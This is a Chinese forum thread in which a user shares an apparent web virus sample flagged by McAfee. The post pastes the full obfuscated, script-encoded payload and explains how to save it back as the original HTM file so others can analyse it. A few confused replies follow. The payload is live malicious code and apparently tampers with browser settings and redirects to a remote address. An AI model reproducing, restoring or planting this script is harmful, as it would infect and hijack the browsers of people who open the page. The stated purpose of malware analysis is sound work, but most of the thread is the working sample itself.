一个网页病毒样本,谁有兴趣请分析分析,(请小心,中毒不管我事,我不知道危害后果!)(5分)

  • 主题发起人 主题发起人 懒少爷
  • 开始时间 开始时间

懒少爷

Unregistered / Unconfirmed
GUEST, unregistred user!
这个病毒是MCAFEE查出来的,文件名为:
MAIN2[1].HTM.VIR
这个病毒有这样高明之处:当你把文件名的 .VIR 删除,用写字板打开他时 ,他会自动改回来变成
MAIN2[1].HTM.VIR
下面是我把他改名为MAIN2[1].TXT后用写字板打开,COPY->贴上来的,您把他COPY下来,存为上边的文件名
即可还原.
请大虾们踊跃发言

#@~^MQgAAA==@&b0~vNKmEs+ OR1WG3b+ r N+X60vJVKC[FZJ*Px'~R8#`@&9Gm!:nUDRmGG0kn'rsKl[8!{o+ +MCVpPn6ak.nk'?mO~, ,,B;x, Z!XPTq=c*)W0PVHPI,Ji@&[Km;:UDRAMkD+V `E@!bhnJ2:P^G9+'1G:c:/cC^Yb/( b^Ob/n(;G:aWUn YPAr9Y4'Z~4+rTtD'!,k9xbaF@*@!JbKKd2K@*v#p@&0!U^YbW PdYC.D`bP@&7 @&d-CMPZhU@&d-lM~mFx9W1E:xD laws+D/cEzwFrbi@&d/m.~j"Sy'EtOOa)&zSAhc/nCMmtUGSRA/Jdl.1tJJi@&dmqRk+OZd?(9vJ w1&lfZy+RF;sZOqF9T b9AOR!ZZT*wf*0)ZANJ*I@&dC8R1D+mY(xkYCx1+cbp@&d;hx,'Pmq MY}4%+^Ov#Id@&WE mOrKxPrUkYCV^n9`b, @&D+DEMUPvZhxcInL"+l9cJ_|Z`ww?K0DhCDnw':rmMGN/wwx4EbcVnxTO4'x2#p@&8@&0!UmDkGx,oGLKoWvb@&P@&d7C.P!D^'/:U "+LICNvJuF;j-wjK0Ohm.-wtk1DWkW6O-'qUYDUnDP2X2VKD+MwwHmk -w?OCMY~nmL+r#I@&iZ:U "+LMrD+crCnZj'-UG0DhCD-w/bmDKdW6Y-'(UYD +OP3aaVGD.-'HCr --jOmDOPhCT+EBPrtYDw=&zShARk+C.1txKARS/zMn[kMRat2JbI@&d/: Io .bY+cE_|JH'wUro:zI2'-trmMWdW6Yww&xY.xYPAa2VKDDw-jnmD^t'w?l.^4b/drkYCxDEBPi"Sy#i@&d;hxcInoqDrO`J_FSt--U6oKqb"2w-/r1DG/KWY'-(UD+DUnDP36asKDnM-'?+mD14-'Z;/DWhr.+?CD1tJB~iId *i@&d/h R]+T DbYncrC|/i'-jW6OSl.-':k1DK[+7-w+ 4ES,J+ 8J*i@&i77ZsxcIno .bYn`ru|;jwwUW0OAmDn-'/bm.K/K0Y'-qrx9WA/'-/;MD+ O.D/bGU-'q YnDUnDPj+DOk odw'}WUnk-w&'w8!T8JBP!BPr]2V{9}I9E*i@&i7d;:xc]noqDbYn`EunZi-'jW6YACM+-w/bm.WkG6Yw'bxNKhkw-;E.DxO#D/bGx'-q OnD +DPj+OObxL/'w}Kxnd'-&ww8!TcrS,!S,J"2M|fq6IGJbi@&d77;:xc]+TDbOn`rCnZi-wjK0Ohm.+'-/r1DWdG6Yw-qr NGS/'-Z!DMnxD.nDkkGU'-q O+Mx+D~j+DYbxL/ww/WU+kw-2-wqy!!ES,!SPr]AMmG}Ifr#p@&did/: R]nTDbO+vJCn/i-'?K0OhC.-wHb^DK/GWD-- r NGhkw'Z;MDxYj+MdkKxw-&xOnMx+D~?YYbUL/'-/WU+dw'&w-8+!8JS~Z~PE]AMmfq6"fE*i@&ddiZsUR"+LMkOnvJCn/j'-?KWOhmD-wHr^MWdW6O-'rU9Whdw'Z;DMn Y#DkkW -'(xD+.xY~jYYbUok--/GU+k-'&w-q*Z*E~,T~,J]3V{f 6"fE#p@&id7@&@&9Wm!:UYch.kD+cE@!qs")HAP?"/x-rtDY2)&&ShARknlMm4UKhRAdJmGW0rR24wQJ_!D^QJ'J~hbNO4{!P4nkTtY{T~4KD9+.'T~km.W^s4mDdx W@*@!&&s]bt3@*Jbp@&)zzTWTGoKoG@&6EU^DkW ~+MDWMuCx9VDc#@&`@&oGoKLWv#I@&M+Y;. POD!np@&N@&hbxNKhcGxD.WMPx~DDK.CmxN^n.i@&/mD~kUdD'rxkOl^Vn[v#i@&r6Pck dD#`@&NKmEs+ OR^W^lDkGU{JtDOw=zzyT1Ry*cF{&
*Jw4wJWDm:n0JlN[ 4YhVrI@&8@&)zJ0E mDrW PdYmDO@&k+Y:r:WEDcv/DlMYc#vS8!T!*I@&)@&nsk+P`@&9W^Esn Y ^W1lYbW xJ4YOw=z&+Z,RyXR8G&c*&w4wJ0.lhnRzCN9 tD:sEp@&8@&hqkCAA==^#~@

 
这个病毒有这样高明之处:当你把文件名的 .VIR 删除,用写字板打开他时 ,
他会自动改回来变成MAIN2[1].HTM.VIR
这就和冰河一样病毒的自我复原,其实实现也不难的!我不懂的是你copy的这
些乱码也能执行?好像从头到尾都不会运行它!(如果我硬盘有这个文件)
他会关联什么文件执行吗?
 
不懂!!
 
瞎掰,.......试过了又怎样?
 
多人接受答案了。
 
后退
顶部